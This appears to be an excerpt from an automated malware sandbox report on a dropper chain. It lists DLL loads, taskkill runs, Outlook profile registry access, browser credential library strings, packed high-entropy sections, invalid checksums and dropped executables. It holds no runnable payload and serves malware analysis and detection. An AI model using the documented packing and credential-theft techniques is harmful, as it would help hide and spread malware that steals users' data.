Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 2949120 > 1048576

Source: file.exe

Static PE information: Raw size of gmhlytvb is bigger than: 0x100000 < 0x2a4a00

Source:	Binary string: mozglue.pdbP source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: nss3.pdb@ source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000002.2447177544.0000000000192000.00000040.00000001.01000000.0000000B.sdmp, DHMGC7TXSIK31JTC83MV8ND88A.exe, 00000008.00000003.2314064013.0000000004E40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Unpacked PE file: 4.2.6IF65DE3AL7UEH5E4W09DIZ.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 5.2.skotes.exe.490000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Unpacked PE file: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Unpacked PE file: 8.2.DHMGC7TXSIK31JTC83MV8ND88A.exe.190000.0.unpack :EW;.rsrc:W;.idata :W;rlkngmqk:EW;jjmnbtpn:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Unpacked PE file: 10.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Unpacked PE file: 11.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Unpacked PE file: 12.2.b0b9f39429.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Unpacked PE file: 13.2.e192e43b61.exe.9a0000.0.unpack :EW;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;gmhlytvb:EW;oycggmgz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Unpacked PE file: 26.2.b0b9f39429.exe.ba0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;rhebxyzr:EW;gzayextq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Unpacked PE file: 33.2.C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ujtayirb:EW;rmnowbou:EW;.taggant:EW;

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: num.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: skotes.exe.4.dr	Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7
Source: b0b9f39429.exe.7.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: random[1].exe.7.dr	Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: real checksum: 0x2b7d41 should be: 0x2bb395
Source: random[1].exe0.7.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: e192e43b61.exe.7.dr	Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: file.exe	Static PE information: real checksum: 0x2db270 should be: 0x2d39e4
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: real checksum: 0x1c70fa should be: 0x1c8212
Source: num[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: real checksum: 0x1d0686 should be: 0x1ce3d7

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: gmhlytvb
Source: file.exe	Static PE information: section name: oycggmgz
Source: file.exe	Static PE information: section name: .taggant
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name:
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: .idata
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: rlkngmqk
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: jjmnbtpn
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: .taggant
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: .idata
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name:
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: ujtayirb
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: rmnowbou
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: .taggant
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .rsrc
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .idata
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: rhebxyzr
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: gzayextq
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: .idata
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: ujtayirb
Source: skotes.exe.4.dr	Static PE information: section name: rmnowbou
Source: skotes.exe.4.dr	Static PE information: section name: .taggant
Source: freebl3.dll.6.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.6.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.6.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.6.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.6.dr	Static PE information: section name: .didat
Source: nss3.dll.6.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.6.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.6.dr	Static PE information: section name: .00cfg
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe.7.dr	Static PE information: section name: gmhlytvb
Source: random[1].exe.7.dr	Static PE information: section name: oycggmgz
Source: random[1].exe.7.dr	Static PE information: section name: .taggant
Source: e192e43b61.exe.7.dr	Static PE information: section name:
Source: e192e43b61.exe.7.dr	Static PE information: section name: .rsrc
Source: e192e43b61.exe.7.dr	Static PE information: section name: .idata
Source: e192e43b61.exe.7.dr	Static PE information: section name: gmhlytvb
Source: e192e43b61.exe.7.dr	Static PE information: section name: oycggmgz
Source: e192e43b61.exe.7.dr	Static PE information: section name: .taggant
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.7.dr	Static PE information: section name: .idata
Source: random[1].exe0.7.dr	Static PE information: section name:
Source: random[1].exe0.7.dr	Static PE information: section name: rhebxyzr
Source: random[1].exe0.7.dr	Static PE information: section name: gzayextq
Source: random[1].exe0.7.dr	Static PE information: section name: .taggant
Source: b0b9f39429.exe.7.dr	Static PE information: section name:
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .rsrc
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .idata
Source: b0b9f39429.exe.7.dr	Static PE information: section name:
Source: b0b9f39429.exe.7.dr	Static PE information: section name: rhebxyzr
Source: b0b9f39429.exe.7.dr	Static PE information: section name: gzayextq
Source: b0b9f39429.exe.7.dr	Static PE information: section name: .taggant
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: .idata
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name:
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: ujtayirb
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: rmnowbou
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: .taggant
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .rsrc
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .idata
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name:
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: rhebxyzr
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: gzayextq
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0177A4FA push eax; iretd	0_3_0177A539
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_0177A56C pushad ; iretd	0_3_0177A56D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785FE6 push ebp; iretd	0_3_01785FE7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_01785A4E push ds; ret	0_3_01785A62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968
Source: C:\Users\user\Desktop\file.exe	Code function: 0_3_05E23967 push ecx; ret	0_3_05E23968

Source: file.exe	Static PE information: section name: entropy: 7.982112788144997
Source: DHMGC7TXSIK31JTC83MV8ND88A.exe.0.dr	Static PE information: section name: entropy: 7.811229692376571
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: entropy: 7.983548363166369
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe.0.dr	Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe.0.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: skotes.exe.4.dr	Static PE information: section name: entropy: 7.983548363166369
Source: skotes.exe.4.dr	Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: random[1].exe.7.dr	Static PE information: section name: entropy: 7.982112788144997
Source: e192e43b61.exe.7.dr	Static PE information: section name: entropy: 7.982112788144997
Source: random[1].exe0.7.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: b0b9f39429.exe.7.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: entropy: 7.983548363166369
Source: C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe.10.dr	Static PE information: section name: ujtayirb entropy: 7.953712273464536
Source: UDUFEWZ4SDVC5XI69Q6Z0RB48.exe.10.dr	Static PE information: section name: rhebxyzr entropy: 7.953785461765037

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File created: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
